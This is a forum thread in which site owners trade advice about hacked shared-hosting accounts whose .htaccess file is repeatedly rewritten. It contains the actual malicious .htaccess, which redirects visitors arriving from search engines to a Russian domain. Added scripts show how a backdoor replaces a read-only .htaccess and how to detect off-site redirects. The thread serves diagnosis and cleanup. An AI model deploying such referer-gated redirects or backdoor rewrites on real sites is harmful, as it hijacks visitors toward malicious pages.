malicious .htaccess reappearing
02-13-2012, 06:35 PM
Post: #1
malicious .htaccess reappearing
I'll try my best to describe the problem. My .htaccess file is somehow being overwritten with malicious code that redirects to a Russian URL. Even if I delete the .htaccess file, it reappears within 10 minutes with the same code. I deleted all my databases and removed directories that I rarely accessed. The .htaccess file has always been set to 444. I'm pulling my hair out because I don't understand how this continues to happen. Just before making this thread I deleted the .htaccess file, so I don't have the code to share. When it comes back I'll post the code so you'll have a better understanding.
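The 444 mode on .htaccess is the detail worth pausing on. As an added example (not from the thread, and not the poster's own setup), the shell session below reproduces why a read-only file still comes back. It assumes what is true on most shared hosts: PHP runs as the account owner, so a planted PHP backdoor has exactly the owner's rights. All paths are scratch directories created with mktemp, and the attacker host attacker.invalid is a placeholder.

```shell
#!/bin/sh
# Added example, not from the thread. It reproduces why "chmod 444 .htaccess"
# did not keep the file from coming back. Assumption: as on most shared hosts,
# PHP runs as the account owner, so a planted PHP backdoor has the owner's
# rights. Deleting a file needs write permission on the directory, not on the
# file, and the owner may also just chmod the file writable again.

# Scratch docroot holding a read-only .htaccess, like the poster's (constructed).
make_docroot() {
    dir=$(mktemp -d) || return 1
    printf 'RewriteEngine Off\n' > "$dir/.htaccess"
    chmod 444 "$dir/.htaccess"
    printf '%s\n' "$dir"
}

# Attempt 1: append in place. The 444 blocks this for a non-root process.
write_in_place() {
    printf 'RewriteRule ^(.*)$ http://attacker.invalid/ [R=301,L]\n' >> "$1/.htaccess" 2>/dev/null
}

# Attempt 2: what a backdoor running as the owner actually does. unlink() only
# checks the directory's permission bits, so the 444 file is removed and a new
# one appears with the umask default mode, writable again.
backdoor_replace() {
    rm -f "$1/.htaccess" || return 1
    cat > "$1/.htaccess" <<'EOF'
RewriteEngine On
RewriteRule ^(.*)$ http://attacker.invalid/index.php [R=301,L]
EOF
}

# The check to run on your own account: is the parent directory writable by
# you? If yes, a process running as you can replace any file in it regardless
# of that file's mode.
parent_writable() {
    if [ -w "$(dirname "$1")" ]; then echo yes; else echo no; fi
}

# Count RewriteRule/ErrorDocument lines pointing at an absolute http(s) URL,
# i.e. redirects that leave your site.
offsite_redirects() {
    grep -Ec '^[[:space:]]*(RewriteRule|ErrorDocument)[[:space:]].*https?://' "$1" || true
}

# Demo run on the scratch docroot.
d=$(make_docroot)
echo "parent directory writable: $(parent_writable "$d/.htaccess")"
echo "off-site redirects before:  $(offsite_redirects "$d/.htaccess")"
if write_in_place "$d"; then
    echo "in-place write succeeded (running as root?)"
else
    echo "in-place write refused, as 444 intends"
fi
backdoor_replace "$d"
echo "off-site redirects after:   $(offsite_redirects "$d/.htaccess")"
ls -l "$d/.htaccess"
rm -rf "$d"
```

The takeaway for the thread: file modes cannot protect .htaccess from code running as the same user, so the only fix is removing the file that keeps writing it. Deleting databases does not help either; the writer is a PHP file in the account, not a database row.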
02-13-2012, 06:46 PM (This post was last modified: 02-13-2012 06:46 PM by LakeRat.)
Post: #2
RE: malicious .htaccess reappearing
It's most likely caused by not updating web app software, or by an insecure theme or plugin.

See this wiki page: http://wiki.dreamhost.com/Troubleshooting_Hacked_Sites

additionally this thread may be of help http://discussion.dreamhost.com/thread-132209.html
02-13-2012, 07:28 PM
Post: #3
RE: malicious .htaccess reappearing
Alright, it just reloaded. Here's the code:

# Redirect only visitors whose Referer header names one of the listed search
# engines or social sites (followed by a dot). Direct visits send no Referer,
# so the site owner never sees the redirect.
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|ask|yahoo|baidu|youtube|wikipedia|qq|excite|altavista|msn|netscape|aol|hotbot|goto|infoseek|mamma|alltheweb|lycos|search|metacrawler|bing|dogpile|facebook|twitter|blog|live|myspace|mail|yandex|rambler|ya|aport|linkedin|flickr|nigma|liveinternet|vkontakte|webalta|filesearch|yell|openstat|metabot|nol9|zoneru|km|gigablast|entireweb|amfibi|dmoz|yippy|search|walhello|webcrawler|jayde|findwhat|teoma|euroseek|wisenut|about|thunderstone|ixquick|terra|lookle|metaeureka|searchspot|slider|topseven|allthesites|libero|clickey|galaxy|brainysearch|pocketflier|verygoodsearch|bellnet|freenet|fireball|flemiro|suchbot|acoon|cyber-content|devaro|fastbot|netzindex|abacho|allesklar|suchnase|schnellsuche|sharelook|sucharchiv|suchbiene|suchmaschine|web-archiv)\.(.*)
RewriteRule ^(.*)$ http://daliachuqimaysa.ru/gluce/index.php [R=301,L]
RewriteCond %{HTTP_REFERER} ^.*(web|websuche|witch|wolong|oekoportal|t-online|freenet|arcor|alexana|tiscali|kataweb|orange|voila|sfr|startpagina|kpnvandaag|ilse|wanadoo|telfort|hispavista|passagen|spray|eniro|telia|bluewin|sympatico|nlsearch|atsearch|klammeraffe|sharelook|suchknecht|ebay|abizdirectory|alltheuk|bhanvad|daffodil|click4choice|exalead|findelio|gasta|gimpsy|globalsearchdirectory|hotfrog|jobrapido|kingdomseek|mojeek|searchers|simplyhired|splut|the-arena|thisisouryear|ukkey|uwe|friendsreunited|jaan|qp|rtl|search-belgium|apollo7|bricabrac|findloo|kobala|limier|express|bestireland|browseireland|finditireland|iesearch|ireland-information|kompass|startsiden|confex|finnalle|gulesider|keyweb|finnfirma|kvasir|savio|sol|startsiden|allpages|america|botw|chapu|claymont|clickz|clush|ehow|findhow|icq|goo|westaustraliaonline)\.(.*)
RewriteRule ^(.*)$ http://daliachuqimaysa.ru/gluce/index.php [R=301,L]
</IfModule>

# An ErrorDocument with an absolute URL is an external redirect, so every
# error response is sent to the same off-site page as well.
ErrorDocument 400 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 401 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 403 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 404 http://daliachuqimaysa.ru/gluce/index.php
ErrorDocument 500 http://daliachuqimaysa.ru/gluce/index.php
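The posted file is a referer-gated redirect: it only fires for visitors arriving from a search engine or social site, which is why the owner, who visits directly, sees a normal site while search traffic is hijacked. The script below is an added example, not part of the thread; it reads a trimmed copy of that .htaccess (a constructed sample with the same structure and a shorter list), pulls out the off-site target, and replays the Referer match the way Apache evaluates it. The live probe with curl at the end is the check to run against your own site; it needs network access, so the demo does not call it.

```shell
#!/bin/sh
# Added example, not from the thread. It reads a trimmed copy of the .htaccess
# posted above (constructed sample below, same structure, shorter list) and
# shows which off-site host it redirects to and why the owner never sees the
# redirect: the RewriteCond fires only when the Referer header names one of
# the listed search engines or social sites, and a direct visit, bookmark or
# typed URL sends no Referer at all.

sample_htaccess() {
    cat <<'EOF'
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteCond %{HTTP_REFERER} ^.*(google|yahoo|bing|facebook|twitter|yandex)\.(.*)
RewriteRule ^(.*)$ http://daliachuqimaysa.ru/gluce/index.php [R=301,L]
</IfModule>
ErrorDocument 404 http://daliachuqimaysa.ru/gluce/index.php
EOF
}

# Hosts that RewriteRule or ErrorDocument lines hand the browser to. Any host
# listed here that is not one of your own domains is the infection.
redirect_hosts() {
    grep -E '^[[:space:]]*(RewriteRule|ErrorDocument)[[:space:]]' "$1" \
        | grep -Eo 'https?://[^/[:space:]]+' | sed -E 's#^https?://##' | sort -u
}

# The regex Apache applies to the Referer header (first HTTP_REFERER cond).
referer_pattern() {
    grep -E '^[[:space:]]*RewriteCond[[:space:]]+%[{]HTTP_REFERER[}]' "$1" \
        | awk '{print $3}' | head -n 1
}

# would_redirect FILE REFERER: "yes" if a request carrying REFERER would hit
# the rule. RewriteCond does an unanchored, case-sensitive (no [NC] flag)
# regex match, which grep -E reproduces for this pattern.
would_redirect() {
    pat=$(referer_pattern "$1")
    [ -n "$pat" ] || { echo no; return 0; }
    if printf '%s\n' "$2" | grep -Eq -- "$pat"; then echo yes; else echo no; fi
}

# Live version of the same check against your own site (needs network, so
# not run here): compare the redirect target with and without a search-engine
# Referer. A clean site gives the same answer both times.
probe_site() {
    curl -sS -o /dev/null -w 'direct:      %{http_code} %{redirect_url}\n' "$1"
    curl -sS -o /dev/null -w 'from google: %{http_code} %{redirect_url}\n' \
        -e 'https://www.google.com/' "$1"
}

# Demo on the constructed sample.
f=$(mktemp)
sample_htaccess > "$f"
echo "redirect targets:"; redirect_hosts "$f"
echo "google referer  -> $(would_redirect "$f" 'https://www.google.com/search?q=x')"
echo "other referer   -> $(would_redirect "$f" 'https://www.example.org/page')"
echo "direct visit    -> $(would_redirect "$f" '')"
rm -f "$f"
```

Run redirect_hosts over every .htaccess in the account (find ~ -name .htaccess), not just the docroot's: the poster in #8 below reports it being rewritten "everywhere", and a hit in a directory you never touch is a strong hint of where the dropper lives.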
02-13-2012, 08:17 PM
Post: #4
RE: malicious .htaccess reappearing
Yeah mate, I had the same issue on a whole lot of my domains a while back.

I'd put in a support request and ask if they can clear out the malicious .php files that will be causing this. These files are often named things like mybest_friend.php and located in a labyrinth of subfolders.

Apparently they get in through exploits in WordPress, Joomla, wiki, etc. Update them all, and it probably wouldn't hurt to change your FTP passwords while you're at it.

Good luck.
02-13-2012, 08:33 PM
Post: #5
RE: malicious .htaccess reappearing
(02-13-2012 08:17 PM)xievon Wrote:  it probably wouldn't hurt to change your FTP passwords while you're at it.

You can check the logs to see if your password has been compromised. I doubt it has in this situation, so changing passwords would have absolutely no effect.

What you do want to do is grep all of your PHP files for something like eval() or base64_decode(), etc. The source of your problem is likely found there. There are many tips on how to do it in these forums as well as the wiki. You can get an idea of how these sorts of hacks work by reading this: http://markmaunder.com/2011/08/01/zero-d...ss-themes/
02-13-2012, 08:33 PM
Post: #6
RE: malicious .htaccess reappearing
(02-13-2012 08:17 PM)xievon Wrote:  Yeah mate, I had the same issue on a whole lot of my domains a while back.

I'd put in a support request and ask if they can clear out the malicious .php files that will be causing this. These files are often named things like mybest_friend.php and located in a labyrinth of subfolders.

Apparently they get in through exploits in WordPress, Joomla, wiki, etc. Update them all, and it probably wouldn't hurt to change your FTP passwords while you're at it.

Good luck.

I figured that's probably what would have to happen. I went ahead and deleted even more files and sub-directories. Everything that I've read online about this seems to suggest the last resort is to delete everything to be absolutely sure you've removed any exploits. Just gonna start from scratch :/ At least I didn't have much worth backing up.
02-13-2012, 08:38 PM
Post: #7
RE: malicious .htaccess reappearing
(02-13-2012 08:33 PM)bobocat Wrote:  You can check the logs to see if your password has been compromised. I doubt it has in this situation, so changing passwords would have absolutely no effect.

I agree, but because he didn't know where it was coming from I did say 'it couldn't hurt'.

FTP exploits aren't as common, but they do still happen.

Anyway - good luck! It can be tricky.
03-14-2012, 05:41 PM
Post: #8
RE: malicious .htaccess reappearing
Hello... I'm having the very same problem. I'm deleting everything I can and scanning all my sites for base64, but it's to the point of flinging myself and my computer across the room-- I've got a lot of files and several sites to babysit. Is there anything specific I should be looking for? It's rewriting my .htaccess files everywhere before I even delete the old ones.
03-14-2012, 05:50 PM
Post: #9
RE: malicious .htaccess reappearing
(03-14-2012 05:41 PM)mtte Wrote:  Is there anything specific I should be looking for?

Might want to jump over to the long thread on the subject... http://discussion.dreamhost.com/thread-134262.html

Remote shells, TimThumb and other insecure plugins, to start. There is much info there, but understanding is the key.

You might also try asking support for help by opening a ticket via the panel. Recent posts suggest they may have developed some tools to help, but help seems to be delayed/slow due to the amount of work. The underlying fact remains: you installed it, and you need to understand what you installed.
03-14-2012, 06:06 PM (This post was last modified: 03-14-2012 06:18 PM by mtte.)
Post: #10
RE: malicious .htaccess reappearing
(03-14-2012 05:50 PM)LakeRat Wrote:  Might want to jump over to the long thread on the subject... http://discussion.dreamhost.com/thread-134262.html

Thanks for this-- it's overwhelming, but I'll find it. I try and minimise plugins, and avoid timthumb and other known scripts. The cleaner script that someone uploaded is proving helpful. My concern is that this is the future of shared servers. I can lock down tighter than... well, than a metaphor I won't indulge. But I'm not a network admin, so I don't know if my efforts are for naught when others on the server could have backdoors with big neon signs on them.
FYI in my case, at least, it seems the culprit was to be found in an old install of ZenCart, which I'd recently dropped onto a subdomain to test some changes for a client. The version (1.38) has known security flaws, and one of my tasks was to try and upgrade the thing. I never found the malicious source file, but deleting the entire test site stopped the reappearing .htaccess problem. I think I'll upgrade it locally...

Good luck to others in the same boat-- check your ZenCart/OSCommerce files...